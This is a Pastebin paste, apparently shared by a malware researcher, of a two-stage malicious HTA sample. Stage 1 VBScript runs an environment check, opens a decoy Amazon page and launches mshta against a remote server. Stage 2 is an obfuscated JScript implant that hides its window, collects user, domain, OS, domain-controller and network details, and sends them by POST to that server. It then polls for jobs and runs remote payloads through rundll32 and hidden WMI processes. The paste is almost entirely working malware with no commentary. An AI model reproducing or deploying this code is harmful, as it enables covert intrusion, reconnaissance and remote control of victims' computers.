API tools faq
paste
Advertisement
dissectmalware

Malicious HTA

dissectmalware
Jun 28th, 2019
1,847
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 12.72 KB | None | 0 0
raw download clone embed print report
  1. igggggnooooooor this line
  2.  
  3. ///////// Stage 1 ///////////////////
  4. <script language="VBScript">
  5. Dim iURL
  6. iURL = "https://www.amazon.com/gp/drive"
  7.  
  8. Set objShell = CreateObject("Wscript.Shell")
  9. strInfo = objShell.expandenvironmentstrings("%COMPUTERNAME%")
  10. strInfo2 = objShell.expandenvironmentstrings("%LOGONSERVER%")
  11. strInfo2 = replace(strInfo2, "\\", "")
  12. if strInfo2 = strInfo then
  13.         msgbox ("error opening document")
  14. else
  15.         objShell.run(iURL)
  16.         objShell.Run "mshta https://docshare.safedatasystems.com:443/235gfd"
  17.         Window.Close
  18.         end if
  19. </script>
  20.  
  21.  
  22.  
  23. ///////// Stage 2 //////////////////
  24.  
  25. <html>
  26. <head>
  27. <script language="JScript">
  28. window.moveTo(-1337, -2019);
  29. window.blur();
  30. window.resizeTo(2, 4);
  31.  
  32. try
  33. {
  34.     window.onerror = function(sMsg, sUrl, sLine) { return false; }
  35.     window.onfocus = function() { window.blur(); }
  36. }
  37. catch (e){}
  38.  
  39. var QASIHKVVLB={};QASIHKVVLB.WUGSEFYMRD=new ActiveXObject("Scripting.FileSystemObject");QASIHKVVLB.UTINHUTENQ=new ActiveXObject("WScript.Shell");QASIHKVVLB.ZXNDGZZVJS="https://docshare.safedatasystems.com:443/235gfd";QASIHKVVLB.FVQIPGWMOE="19cc6085c4b24bfca38cac4b59dddd21";QASIHKVVLB.LLCZPIKBVW="";QASIHKVVLB.BBFFFMPAGP="https://docshare.safedatasystems.com:443/235gfd?V0GGVJNH4X=19cc6085c4b24bfca38cac4b59dddd21;GU1SYCFEL4=";QASIHKVVLB.UHZHKLSJIG="999999999999999";QASIHKVVLB.FPQBBTIMXD=function()
  40. {if(QASIHKVVLB.MMNCUJOVQX())
  41. {try{window.close();}catch(e){}
  42. try{window.self.close();}catch(e){}
  43. try{window.top.close();}catch(e){}
  44. try{self.close();}catch(e){}
  45. try
  46. {window.open('','_self','');window.close();}
  47. catch(e)
  48. {}}
  49. try
  50. {WScript.quit();}
  51. catch(e)
  52. {}
  53. try
  54. {var pid=QASIHKVVLB.CBOGFVBUDV.currentPID();QASIHKVVLB.CBOGFVBUDV.kill(pid);}
  55. catch(e)
  56. {}}
  57. QASIHKVVLB.MMNCUJOVQX=function()
  58. {return typeof(window)!=="undefined";}
  59. QASIHKVVLB.CGHMTFFONF=function()
  60. {try
  61. {function s4()
  62. {return Math.floor((1+Math.random())*0x10000).toString(16).substring(1);}
  63. return s4()+s4()+'-'+s4()+'-'+s4()+'-'+
  64. s4()+'-'+s4()+s4()+s4();}
  65. catch(e)
  66. {}}
  67. QASIHKVVLB.IADMFMQGLO={};QASIHKVVLB.IADMFMQGLO.XBLYTDPQTZ=function()
  68. {try
  69. {var res=QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD("(net session || echo unelevated)","%TEMP%\\"+QASIHKVVLB.CGHMTFFONF()+".txt");if(res.indexOf("unelevated")==-1)
  70. {return true;}
  71. return false;}
  72. catch(e)
  73. {return false;}}
  74. QASIHKVVLB.IADMFMQGLO.SGPEAFIMUA=function()
  75. {try
  76. {var osver=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");var osbuild=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber");return osver+"***"+osbuild;}
  77. catch(e){}
  78. return"Unknown";}
  79. QASIHKVVLB.IADMFMQGLO.ZOIBSQLOBH=function()
  80. {try
  81. {var DC=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName");if(DC.length>0)
  82. {return DC;}}
  83. catch(e)
  84. {}
  85. return"Unknown";}
  86. QASIHKVVLB.IADMFMQGLO.AKJGCYHLAT=function()
  87. {try
  88. {var arch=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\\PROCESSOR_ARCHITECTURE");return arch;}
  89. catch(e){}
  90. return"Unknown";}
  91. QASIHKVVLB.IADMFMQGLO.KCXQBFNYDY=function()
  92. {try
  93. {var cwd=QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD("cd","%TEMP%\\cwd.txt");return cwd;}
  94. catch(e)
  95. {}
  96. return"";}
  97. QASIHKVVLB.IADMFMQGLO.SBMJCKVJOL=function()
  98. {try
  99. {var routeprint4=QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD("route PRINT","%TEMP%\\"+QASIHKVVLB.CGHMTFFONF()+".txt");var res=routeprint4.split("\r\n");for(var i=0;i<res.length;i++)
  100. {line=res[i].split(" ");zerocount=0;itemcount=0;correctflag=false;for(var j=0;j<line.length;j++)
  101. {if(line[j])
  102. {itemcount+=1;if(itemcount==4&&correctflag){return line[j];}}
  103. if(line[j]=="0.0.0.0")
  104. {zerocount+=1;if(zerocount==2)
  105. {correctflag=true;}}}}}
  106. catch(e)
  107. {}
  108. return"";}
  109. QASIHKVVLB.IADMFMQGLO.QDLXGHIFXT=function()
  110. {var net=new ActiveXObject("WScript.Network");var domain="";if(net.UserDomain.length!=0)
  111. {domain=net.UserDomain;}
  112. else
  113. {domain=QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD("echo %userdomain%","%TEMP%\\"+QASIHKVVLB.CGHMTFFONF()+".txt");domain=domain.split(" \r\n")[0];}
  114. var info=domain+"\\"+net.Username;if(QASIHKVVLB.IADMFMQGLO.XBLYTDPQTZ())
  115. info+="*";info+="~~~"+net.ComputerName;info+="~~~"+QASIHKVVLB.IADMFMQGLO.SGPEAFIMUA();info+="~~~"+QASIHKVVLB.IADMFMQGLO.ZOIBSQLOBH();info+="~~~"+QASIHKVVLB.IADMFMQGLO.AKJGCYHLAT();info+="~~~"+QASIHKVVLB.IADMFMQGLO.KCXQBFNYDY();info+="~~~"+QASIHKVVLB.IADMFMQGLO.SBMJCKVJOL();info+="~~~"+QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ();info+="~~~"+QASIHKVVLB.IADMFMQGLO.PXCSZRYQTS();return info;}
  116. QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ=function()
  117. {try
  118. {var encoder=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Nls\\CodePage\\ACP");return encoder;}
  119. catch(e)
  120. {return"1252";}}
  121. QASIHKVVLB.IADMFMQGLO.PXCSZRYQTS=function()
  122. {try
  123. {var encoder=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Nls\\CodePage\\OEMCP");return encoder;}
  124. catch(e)
  125. {return"437";}}
  126. QASIHKVVLB.CIAKFFSIIC={};QASIHKVVLB.CIAKFFSIIC.XGCXDJIHOT=function(data,headers)
  127. {return QASIHKVVLB.SDQYWFAOVF.LGMTONFHSH(QASIHKVVLB.CIAKFFSIIC.RMQSOXDELM(),data,headers);}
  128. QASIHKVVLB.CIAKFFSIIC.MREYDTKIKP=function(e)
  129. {try
  130. {var headers={};headers["errno"]=(e.number)?e.number:"-1";headers["errname"]=(e.name)?e.name:"Unknown";headers["errdesc"]=(e.description)?e.description:"Unknown";return QASIHKVVLB.CIAKFFSIIC.XGCXDJIHOT(e.message,headers);}
  131. catch(e)
  132. {}}
  133. QASIHKVVLB.CIAKFFSIIC.RMQSOXDELM=function(jobkey)
  134. {var jobkey=(typeof(jobkey)!=="undefined")?jobkey:QASIHKVVLB.LLCZPIKBVW;return QASIHKVVLB.BBFFFMPAGP+jobkey+";";}
  135. QASIHKVVLB.CIAKFFSIIC.OCPMLNCMGJ=function()
  136. {var url=QASIHKVVLB.CIAKFFSIIC.RMQSOXDELM();return QASIHKVVLB.SDQYWFAOVF.LGMTONFHSH(url);}
  137. QASIHKVVLB.CIAKFFSIIC.KQCWRWDBZA=function(jobkey,fork32Bit)
  138. {var fork32Bit=(typeof(fork32Bit)!=="undefined")?fork32Bit:false;var cmd="rundll32.exe ***K***\\..\\..\\..\\mshtml,RunHTMLApplication";if(fork32Bit)
  139. cmd=QASIHKVVLB.PEJMFGFUTF.PQYGQIDAVF()+cmd;cmd=cmd.replace("***K***",QASIHKVVLB.CIAKFFSIIC.RMQSOXDELM(jobkey));try{QASIHKVVLB.KENMUZPXQD.KMXUAIQNDC(cmd);}catch(e){QASIHKVVLB.UTINHUTENQ.Run(cmd,0,false);}}
  140. QASIHKVVLB.SDQYWFAOVF={};QASIHKVVLB.SDQYWFAOVF.QWILYWEITP=function()
  141. {var http=null;try
  142. {http=new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");http.setTimeouts(0,0,0,0);}
  143. catch(e)
  144. {http=new ActiveXObject("WinHttp.WinHttpRequest.5.1");http.setTimeouts(30000,30000,30000,0)}
  145. return http;}
  146. QASIHKVVLB.SDQYWFAOVF.ACWUEMNQCB=function(http,headers)
  147. {var headers=(typeof(headers)!=="undefined")?headers:{};var content=false;for(var key in headers)
  148. {var value=headers[key];http.setRequestHeader(key,value);if(key.toUpperCase()=="CONTENT-TYPE")
  149. content=true;}
  150. if(!content)
  151. http.setRequestHeader("Content-Type","application/octet-stream");http.setRequestHeader("encoder",QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ())}
  152. QASIHKVVLB.SDQYWFAOVF.LGMTONFHSH=function(url,data,headers)
  153. {var data=(typeof(data)!=="undefined")?data:"";var http=QASIHKVVLB.SDQYWFAOVF.QWILYWEITP();http.open("POST",url,false);QASIHKVVLB.SDQYWFAOVF.ACWUEMNQCB(http,headers);http.send(data);return http;}
  154. QASIHKVVLB.CBOGFVBUDV={};QASIHKVVLB.KKDYFDJLDD={};QASIHKVVLB.KKDYFDJLDD.IKVTUEVQJX=0x80000000;QASIHKVVLB.KKDYFDJLDD.OKJQQPKLGL=0x80000001;QASIHKVVLB.KKDYFDJLDD.ZYPADGQWJG=0x80000002;QASIHKVVLB.KKDYFDJLDD.DMOKBPYDGJ=0;QASIHKVVLB.KKDYFDJLDD.HXGBIEUDMZ=1;QASIHKVVLB.KKDYFDJLDD.FPJAHMWQGT=2;QASIHKVVLB.KKDYFDJLDD.ZETVECMZFC=3;QASIHKVVLB.KKDYFDJLDD.FXIKUDSPEW=function(computer)
  155. {var computer=(typeof(computer)!=="undefined")?computer:".";var reg=GetObject("winmgmts:\\\\"+computer+"\\root\\default:StdRegProv");return reg;}
  156. QASIHKVVLB.KKDYFDJLDD.LXYBKWSROH=function(hKey,path,key,value,valType,computer)
  157. {var reg=QASIHKVVLB.KKDYFDJLDD.FXIKUDSPEW(computer);reg.CreateKey(hKey,path);if(valType==QASIHKVVLB.KKDYFDJLDD.DMOKBPYDGJ)
  158. reg.SetStringValue(hKey,path,key,value);else if(valType==QASIHKVVLB.KKDYFDJLDD.FPJAHMWQGT)
  159. reg.SetDWORDValue(hKey,path,key,value);else if(valType==QASIHKVVLB.KKDYFDJLDD.ZETVECMZFC)
  160. reg.SetQWORDValue(hKey,path,key,value);else if(valType==QASIHKVVLB.KKDYFDJLDD.HXGBIEUDMZ)
  161. reg.SetBinaryValue(hKey,path,key,value);}
  162. QASIHKVVLB.KENMUZPXQD={};QASIHKVVLB.KENMUZPXQD.KMXUAIQNDC=function(cmd)
  163. {var SW_HIDE=0;var pid=0;var wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2")
  164. var si=wmi.Get("Win32_ProcessStartup").SpawnInstance_();si.ShowWindow=SW_HIDE;si.CreateFlags=16777216;si.X=si.Y=si.XSize=si.ySize=1;var w32proc=wmi.Get("Win32_Process");var method=w32proc.Methods_.Item("Create");var inParams=method.InParameters.SpawnInstance_();inParams.CommandLine=cmd;inParams.CurrentDirectory=null;inParams.ProcessStartupInformation=si;var outParams=w32proc.ExecMethod_("Create",inParams);return outParams.ProcessId;}
  165. QASIHKVVLB.RGTBMPDDFB={};QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD=function(cmd,stdOutPath)
  166. {cmd="chcp "+QASIHKVVLB.IADMFMQGLO.PXCSZRYQTS()+" & "+cmd;var c="%comspec% /q /c "+cmd+" 1> "+QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(stdOutPath);c+=" 2>&1";QASIHKVVLB.UTINHUTENQ.Run(c,0,true);if(QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ()=="936")
  167. {var data=QASIHKVVLB.PEJMFGFUTF.QABBILDSPJ(stdOutPath);}
  168. else
  169. {var data=QASIHKVVLB.PEJMFGFUTF.NBMHEMZVXN(stdOutPath);}
  170. QASIHKVVLB.PEJMFGFUTF.UTYAUIAKVW(stdOutPath);return data;}
  171. QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC=function(cmd,fork)
  172. {var fork=(typeof(fork)!=="undefined")?fork:true;var c="%comspec% /q /c "+cmd;QASIHKVVLB.UTINHUTENQ.Run(cmd,0,!fork);}
  173. QASIHKVVLB.PEJMFGFUTF={};QASIHKVVLB.PEJMFGFUTF.VYENALGHYK=function(path)
  174. {return QASIHKVVLB.UTINHUTENQ.ExpandEnvironmentStrings(path);}
  175. QASIHKVVLB.PEJMFGFUTF.PQYGQIDAVF=function()
  176. {var base=QASIHKVVLB.PEJMFGFUTF.VYENALGHYK("%WINDIR%");var syswow64=base+"\\SysWOW64\\";if(QASIHKVVLB.WUGSEFYMRD.FolderExists(syswow64))
  177. return syswow64;return base+"\\System32\\";}
  178. QASIHKVVLB.PEJMFGFUTF.QABBILDSPJ=function(path)
  179. {var loopcount=0;while(true)
  180. {if(QASIHKVVLB.WUGSEFYMRD.FileExists(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path))&&QASIHKVVLB.WUGSEFYMRD.GetFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path)).Size>0)
  181. {var fd=QASIHKVVLB.WUGSEFYMRD.OpenTextFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path),1,false,0);var data=fd.ReadAll();fd.Close();return data;}
  182. else
  183. {loopcount+=1;if(loopcount>180)
  184. {return"";}
  185. QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC("ping 127.0.0.1 -n 2",false);}}}
  186. QASIHKVVLB.PEJMFGFUTF.NBMHEMZVXN=function(path,exists)
  187. {var exists=(typeof(exists)!=="undefined")?exists:false;if(!QASIHKVVLB.WUGSEFYMRD.FileExists(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path))&&exists)
  188. {var headers={};headers["Status"]="NotExist";QASIHKVVLB.CIAKFFSIIC.XGCXDJIHOT("",headers);return"";}
  189. var loopcount=0;while(true)
  190. {if(QASIHKVVLB.WUGSEFYMRD.FileExists(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path))&&QASIHKVVLB.WUGSEFYMRD.GetFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path)).Size>0)
  191. {if(QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ()=="936")
  192. {var newout="%TEMP%\\"+QASIHKVVLB.CGHMTFFONF()+".txt";QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC("whoami");QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC("certutil -encode "+QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path)+" "+newout);var data=QASIHKVVLB.PEJMFGFUTF.QABBILDSPJ(newout);QASIHKVVLB.PEJMFGFUTF.UTYAUIAKVW(newout);}
  193. else
  194. {var fp=QASIHKVVLB.WUGSEFYMRD.GetFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path));var fd=fp.OpenAsTextStream();var data=fd.read(fp.Size);fd.close();}
  195. return data;}
  196. else
  197. {loopcount+=1;if(loopcount>180)
  198. {return"";}
  199. QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC("ping 127.0.0.1 -n 2",false);}}}
  200. QASIHKVVLB.PEJMFGFUTF.UTYAUIAKVW=function(path)
  201. {QASIHKVVLB.WUGSEFYMRD.DeleteFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path),true);};try
  202. {if(QASIHKVVLB.LLCZPIKBVW!="stage")
  203. {if(QASIHKVVLB.MMNCUJOVQX())
  204. {var path="SOFTWARE\\Microsoft\\Internet Explorer\\Styles";var key="MaxScriptStatements";QASIHKVVLB.KKDYFDJLDD.LXYBKWSROH(QASIHKVVLB.KKDYFDJLDD.OKJQQPKLGL,path,key,0xFFFFFFFF,QASIHKVVLB.KKDYFDJLDD.FPJAHMWQGT);}
  205. QASIHKVVLB.CIAKFFSIIC.XGCXDJIHOT(QASIHKVVLB.IADMFMQGLO.QDLXGHIFXT());try{QASIHKVVLB.CIAKFFSIIC.KQCWRWDBZA("");}catch(e){QASIHKVVLB.CIAKFFSIIC.MREYDTKIKP(e)}
  206. QASIHKVVLB.FPQBBTIMXD();}
  207. else
  208. {if(QASIHKVVLB.MMNCUJOVQX())
  209. DoWorkTimeout();else
  210. DoWorkLoop();}}
  211. catch(e)
  212. {QASIHKVVLB.CIAKFFSIIC.MREYDTKIKP(e);}
  213. function DoWork()
  214. {var epoch=new Date().getTime();var expire=parseInt(QASIHKVVLB.UHZHKLSJIG);if(epoch>expire)
  215. {return false;}
  216. try
  217. {var work=QASIHKVVLB.CIAKFFSIIC.OCPMLNCMGJ();if(work.status==201||work.status==202)
  218. {if(work.responseText.length>0){var jobkey=work.responseText;QASIHKVVLB.CIAKFFSIIC.KQCWRWDBZA(jobkey,work.status==202);}}
  219. else
  220. {return false;}}
  221. catch(e)
  222. {return false;}
  223. return true;}
  224. function DoWorkLoop()
  225. {while(DoWork());QASIHKVVLB.FPQBBTIMXD();}
  226. function DoWorkTimeout()
  227. {for(var i=0;i<10;++i)
  228. {if(!DoWork())
  229. {QASIHKVVLB.FPQBBTIMXD();return;}}
  230. QASIHKVVLB.CIAKFFSIIC.KQCWRWDBZA("");QASIHKVVLB.FPQBBTIMXD();}
  231. </script>
  232. <hta:application caption="no" windowState="minimize" showInTaskBar="no"
  233.                  scroll="no" navigable="no" />
  234.                  <!--  -->
  235. </head>
  236. <body>
  237. </body>
  238. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!